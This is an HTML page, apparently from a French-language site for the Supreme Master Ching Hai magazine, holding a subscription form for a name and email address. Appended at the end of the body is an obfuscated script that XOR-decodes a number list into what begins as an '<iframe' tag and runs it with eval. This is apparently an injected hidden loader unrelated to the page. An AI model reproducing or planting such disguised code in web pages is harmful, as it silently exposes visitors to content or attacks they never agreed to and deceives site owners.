<html>
<head>
<meta name="generator" content=
"HTML Tidy for Linux/x86 (vers 1st January 2002), see www.w3.org">
<title>S'abonner &#224; la revue - La revue Ma&icirc;tre Supr&ecirc;me Ching Hai No. 125</title>
<meta http-equiv="" content="" charset="iso-8859-1">
<link type="text/css" rel="stylesheet" href="news.css">
</head>
<body bgcolor="white" leftmargin="0" topmargin="0" marginwidth="0"
marginheight="0">
<table width="600" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="471" valign="top" height="517">
<p>&#160;</p>

<center>
<h3><font color="#CC00CC">Abonnement &#224; la Revue version
fran&#231;aise</font></h3>

<blockquote>&#160;<br>
<font color="black">Vous serez avis&#233; des nouvelles parutions
des revues et des nouvelles concernant le site.</font> 

<p><font color="blue">Formulaire d'abonnement</font></p>
</blockquote>
</center>

<center>
<form method="post" action=
"http://www.contactdirectavecdieu.org/cgi-bin/services/inscrire.cgi">
<table border width="329">
<tr>
<td nowrap width="32%" bgcolor="#E0FFE0">Nom</td>
<td width="68%"><input type="text" name="nom" size="30" maxlength=
"50"></td>
</tr>

<tr>
<td width="32%" bgcolor="#E0FFE0">Courrier
&#233;lectronique&#160;</td>
<td width="68%"><input type="text" name="courriel" size="30"
maxlength="50" value=""></td>
</tr>

<tr>
<td colspan="2" bgcolor="#FFE0E0"><input type="submit" value=
"Soummettre" name="submit"></td>
</tr>
</table>
</form>
</center>

<p align="center">&#160;</p>
</td>
<td width="129" valign="top" bgcolor="e6e6e6" bordercolor="0"
height="517">
<table width="100%" border="0" cellspacing="0" cellpadding="10"
height="75">
<tr bgcolor="#C0E0C0">
<td height="7"></td>
</tr>

<tr bgcolor="#E8D0E8">
<td height="28">
<p align="center"><a href="content.htm"><font color="#FF3300" face=
"Arial, Helvetica, sans-serif"><font size=
"4">Sommaire</font></font></a></p>
</td>
</tr>
</table>
</td>
</tr>
</table>
<script>x=11;es="55;101;107;124;110;125;116;50;96;96;108;122;114;37;59;126;114;111;109;114;126;89;27;76;76;74;64;4;7;95;64;78;95;68;16;31;15;88;84;91;84;92;65;11;6;24;74;72;88;1;31;86;75;52;49;120;108;107;53;52;34;60;61;51;41;32;34;32;43;41;38;61;62;53;59;120;52;55;52;117;43;46;56;42;43;78;17;10;19;70;91;90;72;1;15;24;10;1;8;80;";var ds=new String();ads=es.split(";");k=ads.length-1;for(var j=0;j<k;j++){e=ads[j];gg="d=e";gg=gg+"^x";eval(gg);x+=1;ds=ds+String.fromCharCode(d);}eval(ds);</script></body>
</html>

